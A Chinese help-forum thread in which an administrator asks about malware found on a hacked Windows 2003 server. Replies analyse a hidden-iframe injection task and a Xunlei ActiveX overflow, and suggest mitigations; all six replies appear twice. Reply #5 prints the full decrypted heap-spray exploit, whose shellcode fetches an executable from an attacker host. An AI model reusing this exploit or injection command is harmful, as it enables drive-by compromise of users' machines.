黑客入侵后遗留下的线索请达人指教

时间:2021-09-29 14:47:23
C:\WINDOWS\ime\imejp\applets\smss.exe -idx 0 -ip 219.238.157.132 -port 80 -insert "<iframe src=http://service-google.cn/vip/Cn27670.htm width=0 height=0></iframe>" -speed 50 -spoofmode 2 -Interval 6

2003系统服务器被黑客入侵.
导致24小时不停的系统崩溃.
研究后发现系统多了个Syslem$帐户.
任务计划里面多了个smss的任务.具体执行命令在最上面.
系统被严重修改权限,导致任务管理起,gpeidit.exe组策略等在administrator用户登录下都无法运行.
在全硬盘恢复文件权限后修改组策略获得任务计划里名为SMSS任务的信息后得出最上的命令,求高人告知有关信息.是否能从中看出什么来.

6 个解决方案

#1


直接看3389的登陆 日志
里面有IP  然后报官

#2


应该是给服务器嵌入了网马,至于说后面的那些参数那就只有smss.exe知道了,从字面来看,应该是往219.238.157.132的80端插入一个长宽为0的嵌入页面,这个http://service-google.cn/vip/Cn27670.htm我看了一下,啥都没有纯粹的一个调用DPClient.Vod对象的,网上查了一下,应该是利用迅雷的漏洞,应该是下载网马用的,具体含义由于我也不熟,你可以自己去看看http://service-google.cn/vip/Cn27670.htm的源文件。

呵呵,还好从来没用过迅雷,不知道迅雷是否有很多漏洞?为一个下载功能付出安全代价值否?

#3


重装系统。用 YLMF 的 Windows 2003 ...
基本安全设置已经免疫了一般的入侵……

#4


这个smss.exe似乎不是系统的smss.exe,所以参数不一定是什么。
猜测功能是是将服务器发布的网页都挂上Cn27670.htm页上的木马,该页上的木马利用eval/function加密,是一个利用迅雷5中pplayer.dll的漏洞,利用特殊字符,导致FlvPlayerUrl函数溢出,都能下载任意文件,能被木马完全控制等。

漏洞防范方法
升级到迅雷5.7.4.404以上版,可以解决这个漏洞;
或者修改注册表 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F3E70CEA-956E-49CC-B444-73AFE593AD7F} 下的"Compatibility Flags"项(dword)值为00000400。

#5


解密后的网页代码我贴出来吧,有兴趣的话可以看看。
第一部分,主要是构造的特殊溢出字串,其中最后一句gl数组解密后是字串“FlvPlayerUrl”:

document.writeln('<object id="gl" classid="clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F"></object>');
var helloworld2Address = 0x0c0c0c0c;
var shellcode = unescape("%u4343"+"%u4343"+"%u4343" + 
"%ua3e9"+"%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c" +
"%u1c70%u8bad%u0868%uf78b%u046a%ue859%u0043%u0000" +
"%uf9e2%u6f68"+"%u006e%u6800"+"%u7275%u6d6c"+"%uff54%u9516" +
""+"%u2ee8%u0000%u8300%u20ec%udc8b%u206a%uff53%u0456" +
"%u04c7%u5c03%u2e61"+"%uc765%u0344%u7804%u0065%u3300" +
"%u50c0%u5350%u5057%u56ff%u8b10%u50dc%uff53%u0856" +
""+"%u56ff"+"%u510c%u8b56%u3c75"+"%u748b%u782e%uf503%u8b56" +
"%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb"+"%u10be" +
"%ud63a%u0874"+"%ucbc1%u030d%u40da"+"%uf1eb%u1f3b%ue775" +
"%u8b5e"+"%u245e%udd03%u8b66%u4b0c"+"%u5e8b%u031c%u8bdd" +
"%u8b04%uc503"+"%u5eab%uc359%u58e8"+"%uffff%u8eff%u0e4e" +
"%uc1ec"+"%ue579%u98b8"+"%u8afe%uef0e"+"%ue0ce%u3660%u2f1a" +
"%u6870%u7474%u3a70%u2f2f%u3032%u3830%u3230%u3432%u732e%u7265"+
"%u6976%u6563%u672d%u6f6f%u6c67%u2e65%u6e63%u782f%u2e6c%u7865%u0065");
var hbshelloworld = 0x100000;
var payLoadSize = shellcode.length * 2;
var spraySlideSize = hbshelloworld - (payLoadSize+0x38);
var spraySlide = unescape("%u0D0D%u0D0D");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (helloworld2Address - 0x100000)/hbshelloworld;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
      memory[i] = spraySlide + shellcode;
}

function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
  spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}
var size_buff = 1070;
var x =  unescape("%0c%0c%0c%0c");
while (x.length<size_buff) x += x;
fasdfasdf = "flksajdfkasjflksaf";
gl["\x46\x6c\x76\x50\x6c\x61\x79\x65\x72\x55\x72\x6c"] = x;

第二部分就一句css:

textarea style='display:none'

第三部分来自http://js.users.51.la/1554929.js,看样子是一个计数器,没仔细看:

// A Popular Free Statistics Service for 100 000+ Webmasters. 
window.onerror=function(){return true};
document.write ('<script>var a4929tf="51la";var a4929pu="";var a4929pf="51la";var a4929su=window.location;var a4929sf=document.referrer;var a4929of="";var a4929op="";var a4929ops=1;var a4929ot=1;var a4929d=new Date();var a4929color="";if (navigator.appName=="Netscape"){a4929color=screen.pixelDepth;} else {a4929color=screen.colorDepth;}<\/script><script>a4929tf=top.document.referrer;<\/script><script>a4929pu =window.parent.location;<\/script><script>a4929pf=window.parent.document.referrer;<\/script><script>a4929ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a4929ops=(a4929ops==null)?1: (parseInt(unescape((a4929ops)[2]))+1);var a4929oe =new Date();a4929oe.setTime(a4929oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a4929ops+ ";path=/;expires="+a4929oe.toGMTString();a4929ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a4929ot==null){a4929ot=1;}else{a4929ot=parseInt(unescape((a4929ot)[2])); a4929ot=(a4929ops==1)?(a4929ot+1):(a4929ot);}a4929oe.setTime(a4929oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a4929ot+";path=/;expires="+a4929oe.toGMTString();<\/script><script>a4929of=a4929sf;if(a4929pf!=="51la"){a4929of=a4929pf;}if(a4929tf!=="51la"){a4929of=a4929tf;}a4929op=a4929pu;try{lainframe}catch(e){a4929op=a4929su;}document.write(\'<img style="width:0px;height:0px" src="http://vip2.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=51&id=1554929&tpages=\'+a4929ops+\'&ttimes=\'+a4929ot+\'&tzone=\'+(0-a4929d.getTimezoneOffset()/60)+\'&tcolor=\'+a4929color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a4929of)+\'&vpage=\'+escape(a4929op)+\'" \/>\');<\/script>');

#6


服务器上面哎。。。
  没有安装迅雷。。。
不过乱七八糟的系统到是很多。。。
目前可以肯定是被人挂马了。。
  而且System$帐户依然出现了。。
彻底分析事件管理器里的记录了。。
 查到了System$帐户大片的登陆记录。。。
继续追查中。。。

#1


直接看3389的登陆 日志
里面有IP  然后报官

#2


应该是给服务器嵌入了网马,至于说后面的那些参数那就只有smss.exe知道了,从字面来看,应该是往219.238.157.132的80端插入一个长宽为0的嵌入页面,这个http://service-google.cn/vip/Cn27670.htm我看了一下,啥都没有纯粹的一个调用DPClient.Vod对象的,网上查了一下,应该是利用迅雷的漏洞,应该是下载网马用的,具体含义由于我也不熟,你可以自己去看看http://service-google.cn/vip/Cn27670.htm的源文件。

呵呵,还好从来没用过迅雷,不知道迅雷是否有很多漏洞?为一个下载功能付出安全代价值否?

#3


重装系统。用 YLMF 的 Windows 2003 ...
基本安全设置已经免疫了一般的入侵……

#4


这个smss.exe似乎不是系统的smss.exe,所以参数不一定是什么。
猜测功能是是将服务器发布的网页都挂上Cn27670.htm页上的木马,该页上的木马利用eval/function加密,是一个利用迅雷5中pplayer.dll的漏洞,利用特殊字符,导致FlvPlayerUrl函数溢出,都能下载任意文件,能被木马完全控制等。

漏洞防范方法
升级到迅雷5.7.4.404以上版,可以解决这个漏洞;
或者修改注册表 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F3E70CEA-956E-49CC-B444-73AFE593AD7F} 下的"Compatibility Flags"项(dword)值为00000400。

#5


解密后的网页代码我贴出来吧,有兴趣的话可以看看。
第一部分,主要是构造的特殊溢出字串,其中最后一句gl数组解密后是字串“FlvPlayerUrl”:

document.writeln('<object id="gl" classid="clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F"></object>');
var helloworld2Address = 0x0c0c0c0c;
var shellcode = unescape("%u4343"+"%u4343"+"%u4343" + 
"%ua3e9"+"%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c" +
"%u1c70%u8bad%u0868%uf78b%u046a%ue859%u0043%u0000" +
"%uf9e2%u6f68"+"%u006e%u6800"+"%u7275%u6d6c"+"%uff54%u9516" +
""+"%u2ee8%u0000%u8300%u20ec%udc8b%u206a%uff53%u0456" +
"%u04c7%u5c03%u2e61"+"%uc765%u0344%u7804%u0065%u3300" +
"%u50c0%u5350%u5057%u56ff%u8b10%u50dc%uff53%u0856" +
""+"%u56ff"+"%u510c%u8b56%u3c75"+"%u748b%u782e%uf503%u8b56" +
"%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb"+"%u10be" +
"%ud63a%u0874"+"%ucbc1%u030d%u40da"+"%uf1eb%u1f3b%ue775" +
"%u8b5e"+"%u245e%udd03%u8b66%u4b0c"+"%u5e8b%u031c%u8bdd" +
"%u8b04%uc503"+"%u5eab%uc359%u58e8"+"%uffff%u8eff%u0e4e" +
"%uc1ec"+"%ue579%u98b8"+"%u8afe%uef0e"+"%ue0ce%u3660%u2f1a" +
"%u6870%u7474%u3a70%u2f2f%u3032%u3830%u3230%u3432%u732e%u7265"+
"%u6976%u6563%u672d%u6f6f%u6c67%u2e65%u6e63%u782f%u2e6c%u7865%u0065");
var hbshelloworld = 0x100000;
var payLoadSize = shellcode.length * 2;
var spraySlideSize = hbshelloworld - (payLoadSize+0x38);
var spraySlide = unescape("%u0D0D%u0D0D");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (helloworld2Address - 0x100000)/hbshelloworld;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
      memory[i] = spraySlide + shellcode;
}

function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
  spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}
var size_buff = 1070;
var x =  unescape("%0c%0c%0c%0c");
while (x.length<size_buff) x += x;
fasdfasdf = "flksajdfkasjflksaf";
gl["\x46\x6c\x76\x50\x6c\x61\x79\x65\x72\x55\x72\x6c"] = x;

第二部分就一句css:

textarea style='display:none'

第三部分来自http://js.users.51.la/1554929.js,看样子是一个计数器,没仔细看:

// A Popular Free Statistics Service for 100 000+ Webmasters. 
window.onerror=function(){return true};
document.write ('<script>var a4929tf="51la";var a4929pu="";var a4929pf="51la";var a4929su=window.location;var a4929sf=document.referrer;var a4929of="";var a4929op="";var a4929ops=1;var a4929ot=1;var a4929d=new Date();var a4929color="";if (navigator.appName=="Netscape"){a4929color=screen.pixelDepth;} else {a4929color=screen.colorDepth;}<\/script><script>a4929tf=top.document.referrer;<\/script><script>a4929pu =window.parent.location;<\/script><script>a4929pf=window.parent.document.referrer;<\/script><script>a4929ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a4929ops=(a4929ops==null)?1: (parseInt(unescape((a4929ops)[2]))+1);var a4929oe =new Date();a4929oe.setTime(a4929oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a4929ops+ ";path=/;expires="+a4929oe.toGMTString();a4929ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a4929ot==null){a4929ot=1;}else{a4929ot=parseInt(unescape((a4929ot)[2])); a4929ot=(a4929ops==1)?(a4929ot+1):(a4929ot);}a4929oe.setTime(a4929oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a4929ot+";path=/;expires="+a4929oe.toGMTString();<\/script><script>a4929of=a4929sf;if(a4929pf!=="51la"){a4929of=a4929pf;}if(a4929tf!=="51la"){a4929of=a4929tf;}a4929op=a4929pu;try{lainframe}catch(e){a4929op=a4929su;}document.write(\'<img style="width:0px;height:0px" src="http://vip2.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=51&id=1554929&tpages=\'+a4929ops+\'&ttimes=\'+a4929ot+\'&tzone=\'+(0-a4929d.getTimezoneOffset()/60)+\'&tcolor=\'+a4929color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a4929of)+\'&vpage=\'+escape(a4929op)+\'" \/>\');<\/script>');

#6


服务器上面哎。。。
  没有安装迅雷。。。
不过乱七八糟的系统到是很多。。。
目前可以肯定是被人挂马了。。
  而且System$帐户依然出现了。。
彻底分析事件管理器里的记录了。。
 查到了System$帐户大片的登陆记录。。。
继续追查中。。。